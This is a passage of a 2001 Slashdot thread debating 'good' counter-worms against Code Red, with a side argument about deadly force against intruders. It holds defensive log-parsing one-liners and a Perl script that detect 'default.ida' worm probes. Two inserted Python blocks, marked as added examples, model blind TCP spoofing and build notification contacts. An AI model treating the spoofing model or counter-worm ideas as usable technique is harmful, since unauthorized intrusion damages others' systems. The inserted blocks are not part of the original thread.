    And there's another reason that I just mentioned. What happens when a counter-worm patches up a hole before a systems administrator sees it? It's possible that after the initial infection by the worm, the system was further compromised by other crackers. But the counter-worm wouldn't investigate such possibilities, instead it just patches the initial hole. Any new backdoors implanted by crackers AFTER the initial infection would go undetected. This can't be more obvious than with Code Red II. Sure if you become infected, you can delete root.exe and explorer.exe and patch up your IIS system. But what about what went on between the initial infection and when you patch the system? If the web server log files have been erased or altered in any way, you have nothing to go on to tell you what was done to your system. The final solution becomes a full format and reinstall of the system from a (hopefully) clean backup.

    Counter-worms are only counter-productive to the security of computer systems and the Internet. And I haven't even begun to touch upon the legal and ethical problems of using a system without authorization. Not every system administrator out there is going to be happy that you're rooting around their system after it was r00ted. Some (MOST) are going to suspect you did more harm than good. I've had personal experience with this and know it to be a fact. So stay away from writing counter-worms. Instead write an article informing people about the dangers and what to do to fix the problem. Send it to a local paper, send it to an online forum or magazine. You'll do far more good that way than by launching your own counter-worm.

  269. Re:That's the worst idea I've ever heard by arcade · · Score: 2

    While what you say is factually true (spoofing the source is tricky), the principle of not fighting fire with fire is still reasonable. Whenever you automatically respond to an attack with another attack you open up the potential for an explosive situation.

    Yes, I agree totally with that principle. I do however prefer to use factual arguments and not bullshit like the commentor that I responded to did.

    --
    "Rune Kristian Viken" - http://www.nwo.no - arca
  270. Those of us who choose to use Linux... by 9sPhere · · Score: 0

    ...have already seen such things. The "cheese" virus closes backdoors, and the "ramen" virus politely informs you that you need to update your version of Red Hat to fix security issues. If IIS and Outlook users want to write code to fix virus-related problems, that's fine. I'm sure there's a job waiting for them in Redmond.

    --
    It is pitch dark. You are likely to be eaten by a grue.
  271. How recognize the good and the bad ? by zeux · · Score: 1

    If you do that, how would our anti-virus software (like norton) make the difference between a good and a bad virus ?

  272. Re:What if my 'default.ida' was a program? by gamorck · · Score: 0

    Thats EXACTLY what I have been trying to do! You can find a more detailed explanation of my code at http://24.18.6.248/default.asp (latest news update)

    I just cannot get the damn thing to work outside the test environment. Email me if you want more info or want to check out the source.

    Gam
    "Flame at Will"

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  273. Re:That doesn't solve the problem. by hizzoyt · · Score: 1

    > A: Microsoft needs to release more secure OS/Web servers.

    This *may* be the case, but I think you're falling into the ever so common (and closed-minded) "MS BAD, GNU GOOD" mindset. Yes, open source is a better programming method.. But excellent programs aren't written in a day. IIS is currently standing the "test of time" right now, and there is a huge bug in it, just as there have been huge bugs in [insert your favorite open source program here]. I would bet the next major release of IIS will not have this security hole.

    > B: People need to patch their system themselves or take it off the net.

    Agreed.

    -Hoyt

  274. entirely possible? yes. Likely scenarios below. by vladkrupin · · Score: 1

    It is possible, as in 'doable' - that's true. But think about the implications.

    First being technological. Say, you have a 100 or so viruses going around. Would you scan all your neighboring subnets and infect all the machines you find with an 'anti-virus' like that? If CodeRed by itself creates bandwidth issues and headaches (think AT&T @HOME), think of a 100 or so 'anti-viruses' contributing in the same way at the same time!

    Second being ethical. If you are hacked once, do you want another 100 people to hack your computer to 'fix' the damage someone else has done? Or, better yet, How would you like people hacking your machine in a 'benign' fashion because they were pursuing a good cause, and hacked your computer to vaccinate it? The cause is noble - it might prevent the spread of the real virus, were you ever to be infected by it, but how much do you care about how good the intentions of the one who hacked you were?

    Last, but not least, is legal. What if all those 'anti-viruses' essentially DOS your box trying to 'fix' it? Can you sue the one who sent you the anti-virus? What if something went berserk in the code of the anti-virus (yeah, I know, software does not have bugs, but what if it happens), and wipes out your whole server, while it could be fixed fairly easily otherwise? Can you sue the creator? Probably yes. After all, the 'anti-virus' virus did not present you with a click-through license that disclaimed any liability or even gave you a choice to *not* be infected.

    Just a few thoughts that came to mind. There are more. If you can think of some, post below!

    --

    Jobs? Which jobs?
  275. Re:Why do favors? by brlewis · · Score: 1, Flamebait

    Seriously, do you have any data showing that Code Red does "bog down" traffic globally?

    There's never been a worm that exploited an Apache hole the way this IIS hole is being exploited. That's not flamebait; that's a fact.

    It's been years since any remote vulnerability has been discovered in Apache. That's not flamebait; that's a fact.

    Are you willing to make a new "nice guy" worm every time a new evil IIS worm comes out? If not, then you would only lull IIS admins into a false sense of security by fixing their problem for them this time. Let them deal with it; it's a valuable educational experience.

  276. "Cheese Worm" on Linux Did This by Lethyos · · Score: 2

    An article on /. came up a while ago about a worm that did just this called "Cheese Worm".

    It fixed a back door created by another worm then goes looking for other systems infected by the l10n worm.

    Yes, it's a novel idea. No, it's not the solution. Not everyone runs the same distro/OS and not everyone has them configured the same.

    It would take an amazing amount of design and coding work to create one that intelligently fixed configuration problems without creating more nightmares for the admin, and even then, it's likely to cause more problems than it fixes. Then it would no longer be a worm - it'd be a "service pack". :-)

    --
    Why bother.
  277. Re:Why do favors? by SuiteSisterMary · · Score: 2, Insightful

    This is NOT an "IIS" hole. That's a fact. This is an Indexing Server hole. That's a fact. Comparing this to 'apache never having an exploit like this' is wrong. That's a fact. Comparing this to some apache module or CGI script being exploited, which has happened, and will continue to happen, is accurate. That's a fact.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  278. MSFT trains users to click virus attachments by brlewis · · Score: 1
    And while we're working on Code Red, can we send a large man to the home of my latest Sircam senders and politely "ask" them to stop clicking on virii?

    I was surprised when a virus got sent from someone I thought would know better. After thinking it through, it's not at all surprising.

    The problem is that daily use of MSFTware trains users to click on such attachments and ignore the warnings. A Word macro should only be able to affect the document it's in. Likewise an Excel macro. Yet MSFT engineers took the lazy route and enabled unlimited powers in files that should be data, not programs.

    The result is that people who exchange documents and spreadsheets via e-mail are (correctly) warned with a popup box every time they open one. They proceed anyway, because that's what they have to do. Daily habit trains them to ignore the warnings.

  279. Virii that fight Virii by Anonymous Coward · · Score: 0

    ...why does all this remind me of the problems that Australia had with rabbits, then cats, then other animals introduced to fight the original problem plants/animals there? More virii will slow down the net, and everyone will have to have programs installed on their computer to filter them out just to surf the net! (Wait, we have this already!) But then, all these viruses & cures remind me of the classic radar gun / radar detector loop. The people who make the guns & the detectors will be the ones who profit! So, let's see. I cut my programming teeth by writing viruses, then, when I get really good, I charge people to inoculate their computers. Sounds like I am creating $$ out of thin air! -Kevin

  280. I Hope You Keep Bail Money Near Your Gun by virg_mattes · · Score: 2

    > Yes, but criminal trespass (a crime to which an American citizen
    > can respond with deadly force) and cracking a webserver are of the same magnitude.


    Even if I agreed that criminal trespass and cracking a webserver are the same (they're not, in either a legal or ethical sense), you're way off on the justification for deadly force, at least in the laws of most U.S. jurisdictions. First, cracking a web server is like picking the lock on your front door, which is breaking and entering, not criminal trespass. Second, you're not legally allowed to use deadly force against someone unless they are threatening your life or well-being. Since someone can commit criminal trespass when you're not present, if you drilled someone just because they broke into your house while you were at work, you'd be guilty of second-degree murder. In fact, if you shoot someone who breaks into your house while you're at home, the burden of proof for threat still rests with you (basically, you get "convicted" of justifiable homicide) or you're still going up the river.

    Virg

    1. Re:I Hope You Keep Bail Money Near Your Gun by virg_mattes · · Score: 2

      > I have the right to self defense, and if someone is in my home
      > on some unknown mission I'm not interested in letting him do whatever
      > and then let the law take care of it. I'm going to stop him, doing
      > whatever it takes to do that.


      This is the very essence of why vigilantism is bad. If someone is in your home on an unknown mission, you seem to assume that your only recourse is to kill him. You don't even consider the possibility that anything less than murder is possible or even desirable.

      Consider this: you hear someone in your house, rummaging through your stuff. You stand at the top of the stairs (or around a corner from said stairs) and shout, "I hear you, and I have a gun. If you don't leave, I'll shoot!" The burglar runs out the door and into the night. Now, if you consider this approach to be unacceptable because the burglar will get away, but you don't consider it unacceptable to shoot him rather than give him the opportunity to run, then you have a horrendously deranged sense of personal property.

      So the question becomes not whether you consider it within your rights to shoot someone in your house, but whether you consider the sanctity of your things more important than a human life. Consider that the next time you argue about your "right" to kill someone because of your indignation.

      Virg

    2. Re:I Hope You Keep Bail Money Near Your Gun by Dehumanizer · · Score: 1

      So shoot the legs. Simple.

      --
      The Tlog - a technology blog
    3. Re:I Hope You Keep Bail Money Near Your Gun by ihawk · · Score: 1

      we have a right to "life, liberty, and the pursuit of happiness". Requiring law-abiding citizens to allow any brigand to boldly stroll into a person's house and demand all their possessions denies me my rights

      Go back and check your history again. The "life, liberty, and pursuit" etc is in the Declaration of Independence which is not a basis of law. The constitution doesn't say squat about it, not even in the Bill of Rights. You only have a "right" to what the people with the power let you have.

    4. Re:I Hope You Keep Bail Money Near Your Gun by brunson · · Score: 2, Informative

      Colorado (for positive) and many other states have a "make my day" law. If someone breaks into your home you can automatically assume you are in danger of grievous bodily harm or death and can shoot dead on the spot.

      --
      09F911029D74E35BD84156C5635688C0
      Jesus loves you, I think you suck
    5. Re:I Hope You Keep Bail Money Near Your Gun by Kryptonomic · · Score: 1
      So, you think I can't hold on to my property unless I'm personally prepared to defend it by deadly force?

      I'm glad I don't live in your society...

    6. Re:I Hope You Keep Bail Money Near Your Gun by virg_mattes · · Score: 2

      > If someone comes into my house and wants to take all my stuff,
      > I'm going to shoot him and let the D.A. decide whether to prosecute.


      And I certainly hope that DA decides to have you arrested. See below for my reasoning.

      > In this country, as a wise man said, we have a right to "life,
      > liberty, and the pursuit of happiness". Requiring law-abiding citizens
      > to allow any brigand to boldly stroll into a person's house and demand
      > all their possessions denies me my rights. If pointing a loaded weapon at
      > him doesn't make him realize the error of his ways, then that's not my problem.


      This is a straw man argument in the extreme. Firstly, when a brigand "strolls into a person's house and demand[s] all their possessions", we've gone beyond criminal trespass into assault or robbery. This is a credible threat to safety, which is grounds for justifiable homicide, so it's outside the scope of my original argument (and, it's a ridiculous extension of my argument to say that I think people should be allowed to steal from you with impunity because I accept that proof of justifiable homicide is necessary).

      Secondly, you don't specify what happens when you confront the assailant but again, if he doesn't "see the error of his ways", then it's assault and therefore falls outside the scope of my original argument. The real question is what happens if, for example, the burglar's reaction is to run? As I stated in another post, shooting someone for threatening your safety is justifiable, but shooting someone for stealing your stuff is not, nor is shooting someone who is trying to escape when confronted while stealing your stuff. So, as I said before, if your justification for shooting the invader is, as you stated, "someone comes into my house and wants to take all my stuff", then you deserve to be incarcerated. You should consider lethal force as a last resort, only if your personal safety is endangered, and then only if and when other possible alternatives have been exhausted. As I said in the other post, letting the thief get away is inconceivable to most vigilantes, but that's a much better answer than killing someone when you don't have to do it because you're indignant about being burgled.

      Virg

    7. Re:I Hope You Keep Bail Money Near Your Gun by wheany · · Score: 1
      Even if I agreed that criminal trespass and cracking a webserver are the same (they're not, in either a legal or ethical sense), you're way off on the justification for deadly force, at least in the laws of most U.S. jurisdictions.
      Well, I don't agree that crashing someone's webserver is equal to using deadly force, in legal or ethical sense.
    8. Re:I Hope You Keep Bail Money Near Your Gun by Kintanon · · Score: 2

      I believe many of us work off of the assumption that if the person is committing the one crime (breaking and entering) then they will be willing and able to commit a more grievous crime (theft and assault), and then possibly a yet more serious crime (murder) in order to cover their tracks. I for one am not going to wait for them to get around to step 3. If they are in my home illegally I have to assume that they wish to kill me, in Georgia it's considered polite to give one warning shot before killing anyone who is in your home, a shouted warning that you have a gun is acceptable. So I imagine we would all warn the intruder first. But if they didn't get the hell out of my house right then I'd certainly kill them.

      Kintanon

      --
      Check out JoshJitsu.info for Brazilian Ji
  281. Re:Don't be a part of the problem - cliff's notes by big_cat79 · · Score: 0, Troll

    Blah blah blah --- two wrongs don't make a right --- blah blah blah

    --

    BigCat79

    "The dead have risen and are voting Republican!" --Bart Simpson
  282. Think about traffic by n-baxley · · Score: 1

    The real harm from Code Red I was the amount of traffic it generated. Your white hat worm would cause the same traffic problems if not more since it wouldn't know when to stop.

  283. Less intrusive solution by coyote-san · · Score: 2

    There are two problems with an anti-worm:

    1) there is an obvious, less-intrusive solution to the problem. Log the IP addresses, notify their ISP, and (assuming the ISP is on the ball) they "go dark" until they clean up their act. It's not like it's hard to verify the information provided to the ISP.

    This will guarantee that 1) that system infects nobody else and 2) the owner is aware of the problem.

    2) The second problem is contained in the comments above - quietly patching the system does nothing to undo the damage (it might close a few doors, but *anyone* could have run *anything* on that system while it was open) and does not teach the owner to take responsibility for their system.

    However, this requires the ISP to take action. To be honest, some of these systems are starting to remind me of car alarms that run for hours (e.g., because of high winds) and the owner can't be bothered to shut them off. Breaking some glass on that car is illegal... but few cops or DAs would consider anger vented at a car alarm which kept neighbors up all night a crime without a compelling mitigating factor.

    --
    For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
  284. So the solution would be... by Orlando · · Score: 1

    I wonder if you could fit a whole linux distro into a virus? Solve the root of the problem.

    orlando.

    --
    -= This is a self-referential sig =-
    1. Re:So the solution would be... by Borogove · · Score: 1

      How about: Virus infects IIS machine, makes that machine download and install the linux distro. Then it installs Apache, copies all the IIS files over, and makes a copy of the distro available too. Finally, it starts sending out copies of the virus. Any newly infected machines can get a copy of the distro from their 'parent'.

      --
      There has been a major scientific break-in
  285. Not a good idea.. by Tricot · · Score: 1
    There has been considerable discussion about this on the BugTraq mailing list.

    It has been discussed before for other vulnerabilities as well. But the consensus is that this is a bad idea for a number of reasons, and they can be summarized as:

    • Liability: Most viruses and worms cause problems because they're written poorly. If the "anti-worm" doesn't behave as expected on all systems, and causes damage, the person who wrote it could be liable.
    • Legality: Even though it's well intentioned, it's still legally the same criminal act as the original virus/worm writer committed. If the worm does harm (by breaking somebody's app) then there will likely be criminal as well as civil charges filed.
    • Morality: Fundamentally, this isn't the way the white hats behave. We, as a community should help others fix the problems, but shouldn't be using the techniques of the black-hats to do it... including exploiting security holes and mucking with other people's machines.
    It's certainly a tempting idea, especially for thorny problems like CR, and CRII, but it's also a real minefield.

    -- Mitch
  286. Virus that installs linux by feed_me_cereal · · Score: 1

    I've got an even better solution that will ensure these viruses stop spreading. We create a virus that exploits the CODE RED back door and "patches" NT by installing linux over it. The ultimate security patch! ;)

    --
    "Question with boldness even the existence of a god." - Thomas Jefferson
    1. Re:Virus that installs linux by arielb · · Score: 1

      problem is you replaced openbsd too! idiots!

      --
      ---
  287. Re:Great business plan. by 1000101b · · Score: 1

    This is almost the same thing I said in my post. You wouldn't want it to propagate via the worm technique though... it must remain strictly confined to the intended network (otherwise you might fix potential clients.) On a side note, I wouldn't be surprised if the virus writer(s?) worked for a company that offers this type of service. Look at eEye: they found the vulnerability, got credit from Microsoft, and make money with vulnerability assessment services. Corporate ethics: Make it hard to tell the good guys from the bad.

    --
    Live wrong, impostor.
  288. There are parallels - it has been done before. by Utopia · · Score: 1

    A major security hole was discovered in Red Hat 7.?? (Don't remember the details). Soon after, mysteriously, a virus appeared on the web which fixed the bug.

    Max Vision of whitehats.org found himself in trouble for writing a worm which patched systems for the BIND hole.
    Read more about it at http://www.securityfocus.com/news/203

  289. R U Nuts? by hawkbug · · Score: 1

    Yeah, by making a friendly virus, you're closing the back doors, but who cares really? A friendly virus would be *just* as damaging bandwidth wise, would it not? So, you'd be adding another damn virus to the mix, eating up more and more bandwidth... do the world a favor, and DON'T try to do this.

    1. Re:R U Nuts? by Tower · · Score: 2

      I'm definitely against the idea of another virus/worm, but if the anti-worm resided on a server and only activated in response to a request from an infected server (the reply to the infected server caused the cleanup and patch, plus installed the anti-worm)... it couldn't propagate without provocation, and would slowly eliminate the infected machines. Bandwidth wouldn't go up, since the anti-worm isn't active, only reactive (and only makes one request per attack, which should then prevent further attacks by the attacking box).

      --
      "It's tough to be bilingual when you get hit in the head."
  290. Probably a bad Idea, but I like it by FrostyWheaton · · Score: 1

    If the OSS community could do something like this it might boost their image, but I'm afraid it might only go to promote the connection of OS with black hats/Piracy/virii etc.

    From a practical viewpoint anti-code red will be treated like DeCSS, not in itself evil, but it could be used for evil (DMCA aside, which declares it completely evil (I love the government)). A "virus" is a "virus" to most people, and you can bet dollars to doughnuts (KrispyKreme of course) that no news agency will be quick to use the term "anti-virus" or "vaccine"

    And on another level, it might be a nice object lesson for the people running MS servers that it might be time to try to maybe tighten up some of the massive security holes in their networks. I dunno, stuff like Code Red and SirCam (Someone sent SirCam to my CsMajors mailing list at school) only go to prove that most people do not devote most of their mental cycles to what they are doing while at the computer

    --
    Comments should be like skirts. Short enough to keep your attention, but long enough to cover the subject
  291. Re:That's the worst idea I've ever heard by arcade · · Score: 2

    Anyone who uses a script like that is crazy. Next there will be a Code Red III which spoofs the originating IP and then your perl script becomes an unwitting part of a distributed DOS attack... Then YOU go to jail instead of the Code Red author.

    Oh my, how fscking stupid is it possible to be. Let me give you the hints one by one.

    To attack a webserver you need to use http..

    http uses tcp

    tcp has something called initial sequence numbers

    initial sequence numbers have been randomized rather well in more "recent" (think 97->now) operating systems.

    spoofing a connection via tcp is almost impossible.

    --
    "Rune Kristian Viken" - http://www.nwo.no - arca
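    The reasoning in the post above (a full TCP handshake from a forged source needs the server's initial sequence number, which the forger never receives) can be shown with a small model. This is an added example, not code from the post: a toy acceptor that only establishes a connection when the final ACK carries ISN+1, run once with the old fixed-step ISN policy and once with per-connection random ISNs (the mitigation of RFC 1948/6528). The IP addresses are constructed from documentation ranges, and the 64000 step is the classic BSD value assumed for the model.

```python
import random

MASK32 = 0xFFFFFFFF


class Listener:
    """Toy TCP acceptor. It remembers the ISN it put in each SYN-ACK and marks
    a connection established only when the client's ACK number equals that
    ISN + 1. The SYN-ACK is delivered to the *claimed* source address, so a
    sender whose source address is forged never receives it."""

    def __init__(self, next_isn):
        self._next_isn = next_isn          # callable returning a 32-bit ISN
        self._pending = {}                 # (src_ip, src_port) -> server ISN
        self.established = []

    def syn(self, src_ip, src_port):
        isn = self._next_isn()
        self._pending[(src_ip, src_port)] = isn
        return isn                         # sequence number carried in the SYN-ACK

    def ack(self, src_ip, src_port, ack_number):
        isn = self._pending.pop((src_ip, src_port), None)
        if isn is not None and ack_number == (isn + 1) & MASK32:
            self.established.append((src_ip, src_port))
            return True
        return False


def sequential_isn(step=64000):
    """Pre-1996 BSD-style behaviour (assumed step): the ISN advances by a fixed
    amount per connection, so one observed ISN reveals the next."""
    state = [0]

    def gen():
        state[0] = (state[0] + step) & MASK32
        return state[0]
    return gen


def random_isn(seed):
    """Per-connection unpredictable ISN: the randomization the post refers to."""
    rng = random.Random(seed)
    return lambda: rng.getrandbits(32)


def genuine_handshake(listener, ip, port):
    """A sender using its own address receives the SYN-ACK and always completes."""
    isn = listener.syn(ip, port)
    return listener.ack(ip, port, (isn + 1) & MASK32)


def blind_completion_rate(next_isn, trials, assumed_step=64000):
    """Fraction of handshakes the listener accepts from a forged source.
    Model: the sender first completes one genuine handshake from its own
    address (the only ISN it ever sees), then sends SYN and ACK from a forged
    address and must extrapolate the server's next ISN, because the SYN-ACK
    for the forged connection goes to the forged address, not to it."""
    listener = Listener(next_isn)
    accepted = 0
    for i in range(trials):
        port = 40000 + i
        observed = listener.syn("192.0.2.10", port)          # sender's real address
        listener.ack("192.0.2.10", port, (observed + 1) & MASK32)
        listener.syn("198.51.100.7", port)                   # forged source; SYN-ACK not seen
        guess = (observed + assumed_step + 1) & MASK32
        if listener.ack("198.51.100.7", port, guess):
            accepted += 1
    return accepted / trials


if __name__ == "__main__":
    print("fixed-step ISN:", blind_completion_rate(sequential_isn(), 100))
    print("random ISN:    ", blind_completion_rate(random_isn(1), 100))
```

    With the fixed-step generator every blind attempt is accepted; with 32-bit random ISNs the acceptance rate is 2^-32 per attempt, which is the "almost impossible" in the post. The model ignores everything else a real stack does (timeouts, RST handling, the existing-connection case), which only makes the forger's job harder.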
  292. Re:That's the worst idea I've ever heard by cburley · · Score: 2, Interesting
    the principle of not fighting fire with fire is still reasonable

    Are you unaware that firefighters often do use fire to fight fire?

    (They burn away strips of forest to prevent a forest fire from being able to cross the strips and attack, say, neighborhoods.)

    I think your comment in the next paragraph is right, though, because it illustrates the weakness of the forest-fire analogy.

    In particular, while fighting viruses on the Internet today might be more like fighting a forest fire -- in that the trees are not "smart" at fighting fires, you want to save as many as reasonably possible, yet you're not averse to burning a few more down yourself to avert a larger disaster -- the overall goal should be to convince Internet sysadmins to do for their systems what homeowners and business owners have, over the centuries been encouraged to do: be the first line of defense against fires starting, or offense against fires spreading, etc.

    (Think of elements of "progress" here -- new homes likely have smoke alarms, people are strongly encouraged to report fires quickly, flammable materials are less widely used, buildings are designed for quick exit in the event of fire.)

    Until the Internet resembles something more like today's upscale suburban neighborhood (in its security against fires) than a dry, dense forest, I suggest that fighting fire with fire does have utility, if thoughtfully (rather than arbitrarily) applied by experts.

    --
    Practice random senselessness and act kind of beautiful.
  293. There is another way... by FatOldGoth · · Score: 5, Insightful

    ...though it's not quite as effective.

    Since the start of this week, I've been running a Perl script as an hourly cron job that parses my firewall logs, gets the originating IP addresses of any Code Red scans, does a reverse lookup, attempts to extract a meaningful domain name and then mails a polite notification to postmaster and webmaster at that domain. The notification contains a link to the MS page with the details of the relevant patches.

    Since doing so, I've had a number of responses from people thanking me for pointing out the problem and confirming that their server has now been patched. The response rate is only about 1%, largely due to the fact that around 90% of the problem servers are on dial-ups/cable modems/DSL, but it's better than nothing.

    I'm not advocating that everybody, or even a large number of people, do this, as the amount of traffic it would generate would only add to the problem, but it seems like a more legal solution than another, white-hatted, worm.

    --

    I would be a paid subscriber if Taco and Hemos weren't such cunts
    1. Re:There is another way... by Anonymous Coward · · Score: 0

      The problem with reverse DNS lookup is that it doesn't work much of the time. I've resorted to going to ARIN to see who owns the IP.

    2. Re:There is another way... by Anonymous Coward · · Score: 0
      Sigh. Never send Perl to do a shell script's job.

      That's fine and good if you want it to look *pretty*. But what if you want a simple, quick hack?

      grep `date +%d/%b/%Y` /usr/local/apache/logs/access_log | grep default.ida | cut -d\" -f1 | tr "-" " " | sort | uniq -w12

      One-liner, baby. :) No special interpreter, no dups, and sorted. Gives up everything from today.

      If you wanted them all, period:

      grep default.ida /usr/local/apache/logs/access_log | cut -d\" -f1 | tr "-" " " | sort | uniq -w12


      http://www.greslin.org/codered2.html

    3. Re:There is another way... by Anonymous Coward · · Score: 0

      Can you post your Perl script here for us please? I don't feel like learning Perl today.

    4. Re:There is another way... by FatOldGoth · · Score: 2

      Cool! Thanks for the tip! I'll modify the script to send the addresses to them when I get back to work tomorrow.

      --

      I would be a paid subscriber if Taco and Hemos weren't such cunts
    5. Re:There is another way... by bear_phillips · · Score: 1

      Here is a simple script to parse out the offending IPs and timestamp on linux/apache systems. It removes dupes too.

      #!/usr/bin/perl
      # open the log file
      open(LOG, "/usr/local/apache/logs/access_log") or die "cannot open log: $!";
      while ($line = <LOG>) {
          # Get the code red log lines
          if ($line =~ /default\.ida/) {
              # Split out just the IP and time
              ($validstuff, $junk) = split(/\"GET/, $line);
              ($ip, $time) = split(/- -/, $validstuff);
              $ip =~ s/ //g;
              # Put them in a hash to get rid of dupe IPs
              $ips{$ip} = $time;
          }
      }
      close(LOG);
      # Print it back to the screen
      @keys = keys %ips;
      foreach $tmp (@keys) {
          print "$tmp $ips{$tmp} \n";
      }

      --
      http://www.windmeadow.com/
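      The three approaches in this thread (FatOldGoth's cron job that extracts probing IPs, reverse-resolves them and mails postmaster/webmaster; the shell one-liners; the Perl script) share one core: find the default.ida requests, deduplicate by client IP, and turn an IP into someone to notify. The following is an added example, not any poster's code, that does that in Python on a constructed access_log excerpt (documentation IP ranges, made-up timestamps). Reverse DNS is replaced by a constructed lookup table so the example runs offline; the hostname-to-domain step is a stated heuristic.

```python
import re
from collections import OrderedDict

# Constructed Apache access_log excerpt. A Code Red probe shows up as a GET
# for /default.ida followed by a run of X characters; the posted one-liners
# just grep for "default.ida" and this parser does the same.
SAMPLE_LOG = """\
192.0.2.44 - - [03/Aug/2001:09:12:31 -0400] "GET /index.html HTTP/1.0" 200 1532
198.51.100.9 - - [03/Aug/2001:09:13:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 288
203.0.113.17 - - [03/Aug/2001:09:15:45 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 288
198.51.100.9 - - [03/Aug/2001:10:01:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 288
"""

# Common/combined log format prefix: client ip, ident, user, [timestamp], "request"
LOG_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"'
)


def code_red_probes(log_text):
    """Return an ordered {ip: timestamp_of_first_probe} for every client that
    requested default.ida. One entry per IP is the dedup the posted shell
    (sort | uniq) and Perl (hash keyed by IP) versions do; the Perl one keeps
    the last timestamp seen, this keeps the first."""
    seen = OrderedDict()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "default.ida" not in m.group("req"):
            continue
        seen.setdefault(m.group("ip"), m.group("ts"))
    return seen


# Constructed stand-in for reverse DNS so the example runs offline. A live
# script would call socket.gethostbyaddr(ip) here and, as the reply above
# notes, often get nothing back; None models that case.
FAKE_PTR = {
    "198.51.100.9": "cm-9-100-51-198.example-cable.net",
    "203.0.113.17": None,
}


def notification_domain(hostname):
    """Reduce a PTR name to its last two labels, where postmaster@ and
    webmaster@ are most likely to be read. Heuristic only: it is wrong for
    names under two-level public suffixes such as co.uk, and a real script
    should fall back to the netblock owner's registry contact in that case."""
    if not hostname:
        return None
    labels = hostname.rstrip(".").split(".")
    if len(labels) < 2:
        return None
    return ".".join(labels[-2:])


def contacts_for(probes, ptr_lookup):
    """Map each probing IP to the two addresses the post mails, or None when
    reverse DNS yields nothing usable."""
    result = {}
    for ip in probes:
        domain = notification_domain(ptr_lookup.get(ip))
        result[ip] = (
            ["postmaster@" + domain, "webmaster@" + domain] if domain else None
        )
    return result


if __name__ == "__main__":
    probes = code_red_probes(SAMPLE_LOG)
    for ip, addrs in contacts_for(probes, FAKE_PTR).items():
        print(ip, probes[ip], addrs or "no reverse DNS; look up the netblock owner")
```

      Run against the sample, the parser skips the ordinary index.html hit and reports two distinct probing hosts, one of which has no reverse DNS and so needs the registry lookup the reply above describes. Rate-limiting the notifications (one per IP per day, which the first-sighting dedup makes easy) matters for the reason FatOldGoth gives: a notifier that mails on every hit adds its own traffic to the problem.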
  294. Watch out for Federal Computer Crime Laws by werdna · · Score: 2

    The Electronic Communications Privacy Act and the Computer Fraud and Abuse Act combine with state "Blue Sky" computer crime and fraud law to make this tactic amazingly dangerous for anybody who does this. G-d forbid the license should (accidentally or otherwise) harm any system in any way in so doing -- the damages and liability could be enormous, and there may well be substantial criminal responsibility as well.

    In short, anybody who even begins to perform a passive security audit of a system of another without having obtained written consent TO DO EVERYTHING THAT WAS DONE (exceeding authority can be a crime as well as obtaining authority in some cases) risks the slings and arrows of abusive attorneys.

    It would be nice to have a vigilante virus out there -- the guy who wrote it might even become some kind of folk hero. Even so, he might spend years in jail for his good deeds, and g-d save him if he messed up.

  295. Re:Don't be a part of the problem - Cisco fix by Anne_Nonymous · · Score: 2, Informative

    Also affected are Cisco 678's.

    See http://www.qwest.com/dsl/customerservice/coderedvi rus.html

  296. it has already happened by node3667 · · Score: 2, Informative

    The virus nVIR A was propagating in the Macintosh world (1990). Someone created a second, nVIR B, to counter-attack nVIR A, to replace A with itself.

    There were bugs in nVIR B, making the computer partly unusable, and nVIR B could propagate on a computer which wasn't infected by nVIR A.

    Not everybody was happy :-(

    bye

  297. Something useful by Anonymous Coward · · Score: 0

    What about something like this?

    Put in your apache home directory a new default.ida archive with these lines:

    Now make .ida extension parseable by php.

  298. Already been talked about, already been done by plcurechax · · Score: 1
    It was already talked about in the Interesting People mailing list in reference to the book, Shockwave Rider.

    Been there, done that. The Cheese worm for Linux does basically the same sort of thing.

    Still it's a bad idea. For legal reasons: unauthorized is unauthorized even with good intent. For complexity reasons: the worm/ virus may break something else or have unintended consequences like the Robert Moore Jr. worm in the 1980s. Common sense: Encouraging bad system admin habits, that is to be lazy, is a very bad idea. Think of a silly analogy: like breaking in to fix a faulty burglary alarm is a bad idea.

  299. Re:Its entirely possible by starseeker · · Score: 2

    I'd say a stranger in my house DOES pose a threat to my family. I don't know who this creep is, or what he intends. If my family is at stake you'd better believe I'm going to play safe. I might not shoot the instant I see him, but I'd sure take aim and if he tried to flinch without my permission he's history.

    --
    "I object to doing things that computers can do." -- Olin Shivers, lispers.org
  300. Attention is Money by ka9dgx · · Score: 2
    Attention is money, welcome to the true new economy.

    Perhaps system administrators have other things to do other than keep applying patch after patch to the rubber dinghy Microsoft built as a web server. As long as we have good backups, why bother until something goes wrong? It's a waste of attention to keep patching things, not to mention the odd service pack disasters that make things worse than before.

    Don't go blaming the system administrators who have better things to do, put the blame right where it belongs, in the developers' lap. They should test their code, and not count on us as their test lab.

    --Mike--

  301. Re:Its entirely possible by Anonymous Coward · · Score: 1, Funny

    And I'd say that basically nothing bad will happen to me; I'd just get a couple hundred hosts a day knocking on my door and not getting in.

    But what if you were an @home customer? Then you'd say, "well, I'd be pretty much fucked and could get 1/10 the normal bandwidth from my broadband.". I don't know Tim, but he might say, "you fucking idiot, why are you with @home?".

  302. It's already been done by granto · · Score: 1

    It's funny but I did this as part of a science fair project in early 1997. It made it to the Canada-Wide Science Fair that year and I even won a couple of awards for it. Admittedly virii were very different in 97. My system only dealt with non-resident .com and .exe attacks, but it still worked.

  303. independence day by gladysmalone · · Score: 1

    every july 4 at the retirement center they play the movie independence day some of the people don't like it but i thought it was good but even though it wasn't very patriotic. people always tell me to watch out and not catch computer viruses and i always think about that movie because they used a good virus if it was good enough for them i guess it would work. i really liked the black man in that movie normally they scare me but he seemed like a nice young man even though his wife was a tramp. lois' husband ran off with a woman like that but that was years ago and she died of heart failure a couple years back

    sean says i have to get off the computer now so he will send this for me goodbye your friend gladys malone

    1. Re:independence day by Anonymous Coward · · Score: 0

      Is this a new kind of troll? I'm impressed!

  304. Great Idea!!!! by feed_me_cereal · · Score: 1

